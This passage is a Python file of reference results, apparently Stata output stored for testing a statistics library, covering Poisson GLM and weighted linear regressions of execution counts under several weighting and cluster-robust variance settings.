           marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
           marginsok = "default",
           hac_lag = "15",
           vcetype = "Robust",
           vce = "cluster",
           linkt = "Log",
           linkf = "ln(u)",
           varfunct = "Poisson",
           varfuncf = "u",
           opt1 = "ML",
           clustvar = "id",
           oim = "oim",
           a = "1",
           m = "1",
           varfunc = "glim_v3",
           link = "glim_l03",
           chi2type = "Wald",
           opt = "moptimize",
           title = "Generalized linear models",
           user = "glim_lf",
           crittype = "log pseudolikelihood",
           ml_method = "e2",
           singularHmethod = "m-marquardt",
           technique = "nr",
           which = "max",
           depvar = "executions",
           properties = "b V",
          )
# 7x9 coefficient table (rows = regressors, columns per params_table_colnames).
params_table = np.array([
.00026110166569, .00004098448535, 6.3707440379489, 1.881133617e-10,
.00018077355048, .0003414297809, np.nan, 1.9599639845401,
0, .07781804809828, .11602998752167, .67067186475175,
.50242959011024, -.14959654857083, .3052326447674, np.nan,
1.9599639845401, 0, -.09493110013466, .02432927475974,
-3.9019288931601, .00009542919351, -.14261560243373, -.04724659783559,
np.nan, 1.9599639845401, 0, .29693462055586,
.31774950884716, .93449277587615, .35004976070702, -.32584297288986,
.91971221400158, np.nan, 1.9599639845401, 0,
2.3011832004524, .54874508731474, 4.1935376801516, .00002746374324,
1.2256625926223, 3.3767038082826, np.nan, 1.9599639845401,
0, -18.722067603077, 2.8106198749749, -6.6611880780372,
2.716227723e-11, -24.230781332261, -13.213353873894, np.nan,
1.9599639845401, 0, -6.8014789919532, 3.1571598785659,
-2.1543029981246, .03121641791743, -12.989398647377, -.61355933652912,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 cluster-robust variance-covariance matrix of the estimates.
cov = np.array([
1.679728039e-09, 4.034336761e-06, 1.735749447e-07, -5.093610363e-06,
-4.552211884e-06, .00001563785418, -.00009230028034, 4.034336761e-06,
.01346295800428, .00110922683659, -.01950093608551, -.02957572460439,
.08545644123676, -.23518641056668, 1.735749447e-07, .00110922683659,
.00059191361033, -.00720622811203, -.01195031391163, -.04317371228367,
.03351736744645, -5.093610363e-06, -.01950093608551, -.00720622811203,
.10096475037261, .13375578883899, .49763538443989, -.27357574414228,
-4.552211884e-06, -.02957572460439, -.01195031391163, .13375578883899,
.30112117085206, .65342245458316, -.47102547759356, .00001563785418,
.08545644123676, -.04317371228367, .49763538443989, .65342245458316,
7.8995840816039, -6.5824964755966, -.00009230028034, -.23518641056668,
.03351736744645, -.27357574414228, -.47102547759356, -6.5824964755966,
9.9676584988266]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information-criterion row: N, ll0, ll, df, AIC, BIC (ll0 not reported -> NaN).
infocrit = np.array([
17, np.nan, -31.927328308098, 7,
77.854656616197, 83.68715002459])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions: fitted mean and linear-predictor std. error.
predicted = np.array([
35.226364135742, .05941947177052, 8.1965742111206, .09018591046333,
1.3118965625763, .53127920627594, 3.6862981319427, .23996050655842,
2.0823004245758, .33554902672768, 1.0650315284729, .53513532876968,
1.9260421991348, .32360115647316, 2.4171404838562, .33078169822693,
1.8473218679428, .32581362128258, 2.8643238544464, .46489810943604,
3.1211984157562, .71297109127045, 3.338207244873, .58515930175781,
2.5269968509674, .42410242557526, .89725440740585, .40493285655975,
.97933322191238, .5560839176178, .53462094068527, .419488966465,
1.9790935516357, .3438538312912]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle everything for the unweighted / cluster-robust case.
results_poisson_none_clu1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
    )
# Stata e() scalars/macros for the frequency-weighted cluster-robust run —
# see `cmdline` below: glm ... [fweight=fweight], family(poisson)
# vce(cluster id); N_clust = 9, expanded sample N = 33 (df = 26).
est = dict(
           k_eq_model = 0,
           vf = 1,
           df = 26,
           df_m = 6,
           power = 0,
           canonical = 1,
           rank = 7,
           aic = 3.634510210512826,
           rc = 0,
           p = 6.87057569032e-91,
           chi2 = 435.380362705941,
           ll = -52.96941847346162,
           N_clust = 9,
           k_autoCns = 0,
           converged = 1,
           k_dv = 1,
           k_eq = 1,
           k = 7,
           ic = 3,
           N = 33,
           nbml = 0,
           bic = -67.5595014539113,
           dispers_ps = 1.156216988842385,
           deviance_ps = 30.06164170990202,
           dispers_p = 1.156216988842385,
           deviance_p = 30.06164170990202,
           dispers_s = .8980651978545075,
           deviance_s = 23.34969514421719,
           dispers = .8980651978545075,
           deviance = 23.34969514421719,
           phi = 1,
           cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [fweight=fweight], family(poisson) vce(cluster id)",
           cmd = "glm",
           predict = "glim_p",
           marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
           marginsok = "default",
           hac_lag = "15",
           vcetype = "Robust",
           vce = "cluster",
           linkt = "Log",
           linkf = "ln(u)",
           varfunct = "Poisson",
           varfuncf = "u",
           opt1 = "ML",
           clustvar = "id",
           oim = "oim",
           a = "1",
           m = "1",
           varfunc = "glim_v3",
           link = "glim_l03",
           wexp = "= fweight",
           wtype = "fweight",
           chi2type = "Wald",
           opt = "moptimize",
           title = "Generalized linear models",
           user = "glim_lf",
           crittype = "log pseudolikelihood",
           ml_method = "e2",
           singularHmethod = "m-marquardt",
           technique = "nr",
           which = "max",
           depvar = "executions",
           properties = "b V",
          )
# 7x9 coefficient table (rows = regressors, columns per params_table_colnames).
params_table = np.array([
.00025343868829, .0000293670276, 8.6300422274613, 6.132932700e-18,
.00019588037186, .00031099700472, np.nan, 1.9599639845401,
0, .09081422305585, .09800194027664, .92665739881773,
.35410444288802, -.10126605030142, .28289449641311, np.nan,
1.9599639845401, 0, -.09416451429381, .02511206083893,
-3.7497724658197, .00017699509401, -.14338324911569, -.04494577947193,
np.nan, 1.9599639845401, 0, .27652273809506,
.36749499886987, .75245306451906, .45177864537662, -.44375422418847,
.99679970037859, np.nan, 1.9599639845401, 0,
2.239890838384, .51564197481271, 4.343887712395, .00001399830855,
1.229251138834, 3.250530537934, np.nan, 1.9599639845401,
0, -18.842583191417, 3.2292740757113, -5.8349284543976,
5.381365332e-09, -25.17184407602, -12.513322306813, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.1938260811459,
-2.0549026875586, .03988840483712, -12.822785889672, -.30321770581092,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 cluster-robust variance-covariance matrix of the estimates.
cov = np.array([
8.624223101e-10, 2.413510691e-06, 3.123995891e-07, -4.358439015e-06,
-8.084672085e-06, -4.785328653e-06, -.00003652286809, 2.413510691e-06,
.00960438029799, .00106422375754, -.00911884619892, -.03121758372723,
.06803953530989, -.17715756048416, 3.123995891e-07, .00106422375754,
.00063061559958, -.00844230553011, -.01177586448603, -.05361546061036,
.03844868195577, -4.358439015e-06, -.00911884619892, -.00844230553011,
.13505257419436, .14058853110927, .86184257188631, -.74146699290106,
-8.084672085e-06, -.03121758372723, -.01177586448603, .14058853110927,
.26588664618875, .75712244813913, -.35118919402718, -4.785328653e-06,
.06803953530989, -.05361546061036, .86184257188631, .75712244813913,
10.428211056061, -8.3518020608948, -.00003652286809, -.17715756048416,
.03844868195577, -.74146699290106, -.35118919402718, -8.3518020608948,
10.200525036608]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information-criterion row: N, ll0, ll, df, AIC, BIC (ll0 not reported -> NaN).
infocrit = np.array([
33, np.nan, -52.969418473462, 7,
119.93883694692, 130.41438987719])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions: fitted mean and linear-predictor std. error.
predicted = np.array([
34.815238952637, .07249507308006, 7.3026847839355, .17909966409206,
1.2540435791016, .36725598573685, 3.9734709262848, .1719862818718,
2.0739872455597, .27532628178596, 1.1471545696259, .51580721139908,
1.7763512134552, .23559851944447, 2.2698366641998, .21655206382275,
1.6349502801895, .27835717797279, 2.7504913806915, .44458091259003,
2.862185716629, .54439353942871, 3.5617923736572, .57089400291443,
2.6135795116425, .41426089406013, .775799036026, .35101860761642,
.93375068902969, .39217269420624, .56681954860687, .27232182025909,
1.8914022445679, .24083258211613]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle everything for the fweight / cluster-robust case.
results_poisson_fweight_clu1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
    )
# Scalar estimation results copied from Stata's e() returns for the command
# recorded in `cmdline` (poisson GLM, aweight, vce(cluster id)).
est = dict(
    k_eq_model = 0,
    vf = 1,
    df = 10,
    df_m = 6,
    power = 0,
    canonical = 1,
    rank = 7,
    aic = 4.033797198035106,
    rc = 0,
    p = 6.87057569091e-91,
    chi2 = 435.3803627057688,
    ll = -27.28727618329841,
    N_clust = 9,
    k_autoCns = 0,
    converged = 1,
    k_dv = 1,
    k_eq = 1,
    k = 7,
    ic = 3,
    N = 17,
    nbml = 0,
    bic = -16.30350260869269,
    dispers_ps = 1.548630027479802,
    deviance_ps = 15.48630027479802,
    dispers_p = 1.548630027479802,
    deviance_p = 15.48630027479802,
    dispers_s = 1.202863083186947,
    deviance_s = 12.02863083186947,
    dispers = 1.202863083186947,
    deviance = 12.02863083186947,
    phi = 1,
    cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], family(poisson) vce(cluster id)",
    cmd = "glm",
    predict = "glim_p",
    marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
    marginsok = "default",
    hac_lag = "15",
    vcetype = "Robust",
    vce = "cluster",
    linkt = "Log",
    linkf = "ln(u)",
    varfunct = "Poisson",
    varfuncf = "u",
    opt1 = "ML",
    clustvar = "id",
    oim = "oim",
    a = "1",
    m = "1",
    varfunc = "glim_v3",
    link = "glim_l03",
    wexp = "= fweight",
    wtype = "aweight",
    chi2type = "Wald",
    opt = "moptimize",
    title = "Generalized linear models",
    user = "glim_lf",
    crittype = "log pseudolikelihood",
    ml_method = "e2",
    singularHmethod = "m-marquardt",
    technique = "nr",
    which = "max",
    depvar = "executions",
    properties = "b V",
)
# Coefficient table, 7 rows (regressors + _cons) x 9 cols (see colnames below).
params_table = np.array([
    .00025343868829, .0000293670276, 8.6300422274633, 6.132932700e-18,
    .00019588037186, .00031099700472, np.nan, 1.9599639845401,
    0, .09081422305585, .09800194027665, .92665739881771,
    .35410444288803, -.10126605030143, .28289449641312, np.nan,
    1.9599639845401, 0, -.09416451429381, .02511206083893,
    -3.7497724658192, .00017699509401, -.14338324911569, -.04494577947192,
    np.nan, 1.9599639845401, 0, .27652273809507,
    .36749499887001, .75245306451881, .45177864537677, -.44375422418873,
    .99679970037887, np.nan, 1.9599639845401, 0,
    2.239890838384, .51564197481271, 4.343887712395, .00001399830855,
    1.229251138834, 3.250530537934, np.nan, 1.9599639845401,
    0, -18.842583191417, 3.2292740757119, -5.8349284543965,
    5.381365332e-09, -25.171844076021, -12.513322306812, np.nan,
    1.9599639845401, 0, -6.5630017977417, 3.193826081147,
    -2.054902687558, .03988840483718, -12.822785889674, -.30321770580895,
    np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 covariance matrix of the parameter estimates.
cov = np.array([
    8.624223101e-10, 2.413510691e-06, 3.123995891e-07, -4.358439015e-06,
    -8.084672085e-06, -4.785328653e-06, -.00003652286809, 2.413510691e-06,
    .00960438029799, .00106422375754, -.00911884619892, -.03121758372723,
    .06803953530995, -.1771575604842, 3.123995891e-07, .00106422375754,
    .00063061559958, -.00844230553012, -.01177586448603, -.05361546061038,
    .03844868195581, -4.358439015e-06, -.00911884619892, -.00844230553012,
    .13505257419447, .1405885311093, .86184257188684, -.74146699290197,
    -8.084672085e-06, -.03121758372723, -.01177586448603, .1405885311093,
    .26588664618875, .75712244813928, -.35118919402768, -4.785328653e-06,
    .06803953530995, -.05361546061038, .86184257188684, .75712244813928,
    10.428211056065, -8.3518020609031, -.00003652286809, -.1771575604842,
    .03844868195581, -.74146699290197, -.35118919402768, -8.3518020609031,
    10.200525036615]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria: N, ll0, ll, df, AIC, BIC.
infocrit = np.array([
    17, np.nan, -27.287276183298, 7,
    68.574552366597, 74.40704577499])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predicted mean and linear-predictor std. error (17 x 2).
predicted = np.array([
    34.815238952637, .07249507308006, 7.3026847839355, .17909966409206,
    1.2540435791016, .36725598573685, 3.9734709262848, .1719862818718,
    2.0739872455597, .27532628178596, 1.1471545696259, .51580721139908,
    1.7763512134552, .23559851944447, 2.2698366641998, .21655206382275,
    1.6349502801895, .27835714817047, 2.7504913806915, .44458091259003,
    2.862185716629, .54439353942871, 3.5617923736572, .57089400291443,
    2.6135795116425, .41426089406013, .775799036026, .35101860761642,
    .93375068902969, .39217269420624, .56681954860687, .27232182025909,
    1.8914022445679, .24083258211613]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle for the poisson / aweight / cluster-vce variant.
results_poisson_aweight_clu1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
)
# Scalar estimation results for the pweight variant of the same poisson GLM
# (see `cmdline`; differs from the aweight run mainly in ll/aic/bic/dispersion).
est = dict(
    k_eq_model = 0,
    vf = 1,
    df = 10,
    df_m = 6,
    power = 0,
    canonical = 1,
    rank = 7,
    aic = 7.055225702760191,
    rc = 0,
    p = 6.87057569032e-91,
    chi2 = 435.380362705941,
    ll = -52.96941847346162,
    N_clust = 9,
    k_autoCns = 0,
    converged = 1,
    k_dv = 1,
    k_eq = 1,
    k = 7,
    ic = 3,
    N = 17,
    nbml = 0,
    bic = -4.982438296344967,
    dispers_ps = 3.006164170990202,
    deviance_ps = 30.06164170990202,
    dispers_p = 3.006164170990202,
    deviance_p = 30.06164170990202,
    dispers_s = 2.33496951442172,
    deviance_s = 23.34969514421719,
    dispers = 2.33496951442172,
    deviance = 23.34969514421719,
    phi = 1,
    cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [pweight=fweight], family(poisson) vce(cluster id)",
    cmd = "glm",
    predict = "glim_p",
    marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
    marginsok = "default",
    hac_lag = "15",
    vcetype = "Robust",
    vce = "cluster",
    linkt = "Log",
    linkf = "ln(u)",
    varfunct = "Poisson",
    varfuncf = "u",
    opt1 = "ML",
    clustvar = "id",
    oim = "oim",
    a = "1",
    m = "1",
    varfunc = "glim_v3",
    link = "glim_l03",
    wexp = "= fweight",
    wtype = "pweight",
    chi2type = "Wald",
    opt = "moptimize",
    title = "Generalized linear models",
    user = "glim_lf",
    crittype = "log pseudolikelihood",
    ml_method = "e2",
    singularHmethod = "m-marquardt",
    technique = "nr",
    which = "max",
    depvar = "executions",
    properties = "b V",
)
# Coefficient table, 7 rows x 9 cols (see colnames below).
params_table = np.array([
    .00025343868829, .0000293670276, 8.6300422274613, 6.132932700e-18,
    .00019588037186, .00031099700472, np.nan, 1.9599639845401,
    0, .09081422305585, .09800194027664, .92665739881773,
    .35410444288802, -.10126605030142, .28289449641311, np.nan,
    1.9599639845401, 0, -.09416451429381, .02511206083893,
    -3.7497724658197, .00017699509401, -.14338324911569, -.04494577947193,
    np.nan, 1.9599639845401, 0, .27652273809506,
    .36749499886987, .75245306451906, .45177864537662, -.44375422418847,
    .99679970037859, np.nan, 1.9599639845401, 0,
    2.239890838384, .51564197481271, 4.343887712395, .00001399830855,
    1.229251138834, 3.250530537934, np.nan, 1.9599639845401,
    0, -18.842583191417, 3.2292740757113, -5.8349284543976,
    5.381365332e-09, -25.17184407602, -12.513322306813, np.nan,
    1.9599639845401, 0, -6.5630017977416, 3.1938260811459,
    -2.0549026875586, .03988840483712, -12.822785889672, -.30321770581092,
    np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 covariance matrix of the parameter estimates.
cov = np.array([
    8.624223101e-10, 2.413510691e-06, 3.123995891e-07, -4.358439015e-06,
    -8.084672085e-06, -4.785328653e-06, -.00003652286809, 2.413510691e-06,
    .00960438029799, .00106422375754, -.00911884619892, -.03121758372723,
    .06803953530989, -.17715756048416, 3.123995891e-07, .00106422375754,
    .00063061559958, -.00844230553011, -.01177586448603, -.05361546061036,
    .03844868195577, -4.358439015e-06, -.00911884619892, -.00844230553011,
    .13505257419436, .14058853110927, .86184257188631, -.74146699290106,
    -8.084672085e-06, -.03121758372723, -.01177586448603, .14058853110927,
    .26588664618875, .75712244813913, -.35118919402718, -4.785328653e-06,
    .06803953530989, -.05361546061036, .86184257188631, .75712244813913,
    10.428211056061, -8.3518020608948, -.00003652286809, -.17715756048416,
    .03844868195577, -.74146699290106, -.35118919402718, -8.3518020608948,
    10.200525036608]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria: N, ll0, ll, df, AIC, BIC.
infocrit = np.array([
    17, np.nan, -52.969418473462, 7,
    119.93883694692, 125.77133035532])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predicted mean and linear-predictor std. error (17 x 2).
predicted = np.array([
    34.815238952637, .07249507308006, 7.3026847839355, .17909966409206,
    1.2540435791016, .36725598573685, 3.9734709262848, .1719862818718,
    2.0739872455597, .27532628178596, 1.1471545696259, .51580721139908,
    1.7763512134552, .23559851944447, 2.2698366641998, .21655206382275,
    1.6349502801895, .27835717797279, 2.7504913806915, .44458091259003,
    2.862185716629, .54439353942871, 3.5617923736572, .57089400291443,
    2.6135795116425, .41426089406013, .775799036026, .35101860761642,
    .93375068902969, .39217269420624, .56681954860687, .27232182025909,
    1.8914022445679, .24083258211613]).reshape(17,2)
predicted_colnames = 'predict_mu predict_linpred_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle for the poisson / pweight / cluster-vce variant.
results_poisson_pweight_clu1 = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
)
# Scalar results for the linear-regression counterpart: `regress` with
# aweight and vce(robust) — see `cmdline`. Note t-based inference (df_r = 10).
est = dict(
    rank = 7,
    ll_0 = -55.23556912834824,
    ll = -47.54122045581504,
    r2_a = .3528737432046668,
    rss = 267.3132086911238,
    mss = 393.6105745962962,
    rmse = 5.17023412130557,
    r2 = .5955460895029168,
    F = .7279778160729128,
    df_r = 10,
    df_m = 6,
    N = 17,
    cmdline = "regress executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], vce(robust)",
    title = "Linear regression",
    marginsok = "XB default",
    vce = "robust",
    depvar = "executions",
    cmd = "regress",
    properties = "b V",
    predict = "regres_p",
    model = "ols",
    estat_cmd = "regress_estat",
    wexp = "= fweight",
    wtype = "aweight",
    vcetype = "Robust",
)
# Coefficient table, 7 rows x 9 cols; note 't' statistic here, not 'z'.
params_table = np.array([
    .00177624355887, .00100571734546, 1.7661458926668, .10782432028789,
    -.00046463433267, .0040171214504, 10, 2.2281388519863,
    0, .70240571372092, .54986275700055, 1.2774200557835,
    .23031379083217, -.5227648584123, 1.9275762858541, 10,
    2.2281388519863, 0, -.76566360596606, .46482124106144,
    -1.6472216377583, .13053265392051, -1.8013498724035, .27002266047141,
    10, 2.2281388519863, 0, 5.7915855647065,
    5.8518623033717, .98969956305525, .34566324660643, -7.2471761899099,
    18.830347319323, 10, 2.2281388519863, 0,
    13.018291494864, 7.3741002410906, 1.7654074489417, .10795348742173,
    -3.412227750751, 29.44881074048, 10, 2.2281388519863,
    0, -140.99921608421, 84.973820309491, -1.6593253730463,
    .12803894207791, -330.33268651749, 48.334254349065, 10,
    2.2281388519863, 0, -68.484290889814, 50.764306481463,
    -1.3490638528633, .20706938025917, -181.5942144553, 44.625632675673,
    10, 2.2281388519863, 0]).reshape(7,9)
params_table_colnames = 'b se t pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 robust covariance matrix of the parameter estimates.
cov = np.array([
    1.011467379e-06, .00038778854684, -.00038909911416, .00356508765632,
    .0056952104088, -.07926157334067, -.04218673068644, .00038778854684,
    .30234905153625, -.10112236243026, .59175926747871, 1.4744074711876,
    -25.6203584288, -14.793319880623, -.00038909911416, -.10112236243026,
    .21605878614189, -2.3405630815795, -3.2257627901142, 31.66920792546,
    20.934058595259, .00356508765632, .59175926747871, -2.3405630815795,
    34.244292417623, 34.810403897967, -270.34292245471, -270.19382562804,
    .0056952104088, 1.4744074711876, -3.2257627901142, 34.810403897967,
    54.377354365652, -414.2817137548, -324.24739845086, -.07926157334067,
    -25.6203584288, 31.66920792546, -270.34292245471, -414.2817137548,
    7220.5501379896, 2907.4556071681, -.04218673068644, -14.793319880623,
    20.934058595259, -270.19382562804, -324.24739845086, 2907.4556071681,
    2577.0148125439]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria: N, ll0, ll, df, AIC, BIC.
infocrit = np.array([
    17, -55.235569128348, -47.541220455815, 7,
    109.08244091163, 114.91493432002])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation prediction and its std. error (17 x 2, see colnames).
predicted = np.array([
    23.018356323242, 11.030969619751, 7.6487560272217, 3.2376720905304,
    1.3298480510712, 2.4579885005951, 6.7120413780212, 2.8951823711395,
    .90416890382767, 2.1985862255096, 1.9608836174011, 2.5452246665955,
    4.6054129600525, 2.8738057613373, 2.9902882575989, 1.8505314588547,
    1.4887162446976, 1.47836124897, 5.9044842720032, 4.8891386985779,
    7.0818486213684, 4.6786789894104, 7.5460968017578, 5.5129766464233,
    4.1125593185425, 2.3989260196686, -2.7979807853699, 3.8943622112274,
    -1.4647831916809, 2.8729522228241, -3.5234127044678, 3.7701880931854,
    3.9779393672943, 1.9573417901993]).reshape(17,2)
predicted_colnames = 'predict_mu predict_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle for the WLS / aweight / robust-vce variant.
results_wls_aweight_robust = Bunch(
    params_table=params_table,
    params_table_colnames=params_table_colnames,
    params_table_rownames=params_table_rownames,
    cov=cov,
    cov_colnames=cov_colnames,
    cov_rownames=cov_rownames,
    infocrit=infocrit,
    infocrit_colnames=infocrit_colnames,
    infocrit_rownames=infocrit_rownames,
    predicted=predicted,
    predicted_colnames=predicted_colnames,
    predicted_rownames=predicted_rownames,
    **est
)
# Scalar results for `regress` with aweight and vce(cluster id);
# clustering lowers df_r to 8 (= N_clust - 1) relative to the robust run.
est = dict(
    rank = 7,
    ll_0 = -55.23556912834824,
    ll = -47.54122045581504,
    r2_a = .3528737432046668,
    rss = 267.3132086911238,
    mss = 393.6105745962962,
    rmse = 5.17023412130557,
    r2 = .5955460895029168,
    F = 1.412187242235973,
    df_r = 8,
    df_m = 6,
    N = 17,
    N_clust = 9,
    cmdline = "regress executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], vce(cluster id)",
    title = "Linear regression",
    marginsok = "XB default",
    vce = "cluster",
    depvar = "executions",
    cmd = "regress",
    properties = "b V",
    predict = "regres_p",
    model = "ols",
    estat_cmd = "regress_estat",
    wexp = "= fweight",
    wtype = "aweight",
    vcetype = "Robust",
    clustvar = "id",
)
# Coefficient table, 7 rows x 9 cols; df column is 8 throughout.
params_table = np.array([
    .00177624355887, .00103574504038, 1.7149428571794, .12469817836724,
    -.00061218878728, .00416467590501, 8, 2.3060041352042,
    0, .70240571372092, .64463869959516, 1.0896114585768,
    .30761438040884, -.78413379325815, 2.1889452207, 8,
    2.3060041352042, 0, -.76566360596606, .50850811868177,
    -1.5057057652313, .17056206446331, -1.9382854304311, .40695821849901,
    8, 2.3060041352042, 0, 5.7915855647065,
    6.2948340440059, .92005373362009, .3844480847801, -8.7243277711951,
    20.307498900608, 8, 2.3060041352042, 0,
    13.018291494864, 7.9526248350517, 1.6369804642972, .14027059672576,
    -5.3204942604922, 31.357077250221, 8, 2.3060041352042,
    0, -140.99921608421, 84.897180497105, -1.6608233071889,
    .13532738016362, -336.77246537771, 54.774033209288, 8,
    2.3060041352042, 0, -68.484290889814, 50.203382265366,
    -1.3641369923608, .2096627597382, -184.25349799498, 47.284916215355,
    8, 2.3060041352042, 0]).reshape(7,9)
params_table_colnames = 'b se t pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 cluster-robust covariance matrix of the parameter estimates.
cov = np.array([
    1.072767789e-06, .00042569049255, -.00044272344175, .00386796354086,
    .00653558563917, -.08376884119522, -.04513384476642, .00042569049255,
    .41555905301573, -.07730648264729, -.34087330734824, .82631440946934,
    -31.768811666606, -10.324414524804, -.00044272344175, -.07730648264729,
    .25858050676528, -2.8727606144729, -3.9481543148554, 35.836754991381,
    24.653552354067, .00386796354086, -.34087330734824, -2.8727606144729,
    39.624935641576, 42.351437415382, -335.98208369348, -283.16728769825,
    .00653558563917, .82631440946934, -3.9481543148554, 42.351437415382,
    63.24424176708, -502.21726015398, -366.49477518415, -.08376884119522,
    -31.768811666606, 35.836754991381, -335.98208369348, -502.21726015398,
    7207.531256358, 3532.1379707168, -.04513384476642, -10.324414524804,
    24.653552354067, -283.16728769825, -366.49477518415, 3532.1379707168,
    2520.3795908825]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria: N, ll0, ll, df, AIC, BIC.
infocrit = np.array([
    17, -55.235569128348, -47.541220455815, 7,
    109.08244091163, 114.91493432002])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation prediction and its std. error (17 x 2).
predicted = np.array([
    23.018356323242, 11.727355003357, 7.6487560272217, 3.4638004302979,
    1.3298480510712, 2.1195623874664, 6.7120413780212, 2.8227334022522,
    .90416890382767, 2.2036759853363, 1.9608836174011, 2.0707910060883,
    4.6054129600525, 2.9022018909454, 2.9902882575989, 1.6939970254898,
    1.4887162446976, 1.8477793931961, 5.9044842720032, 4.8752007484436,
    7.0818486213684, 4.4365234375, 7.5460968017578, 5.6850047111511,
    4.1125593185425, 2.7407164573669, -2.7979807853699, 3.9614858627319,
    -1.4647831916809, 2.4376966953278, -3.5234127044678, 3.5529434680939,
    3.9779393672943, 1.7075037956238]).reshape(17,2)
predicted_colnames = 'predict_mu predict_std'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
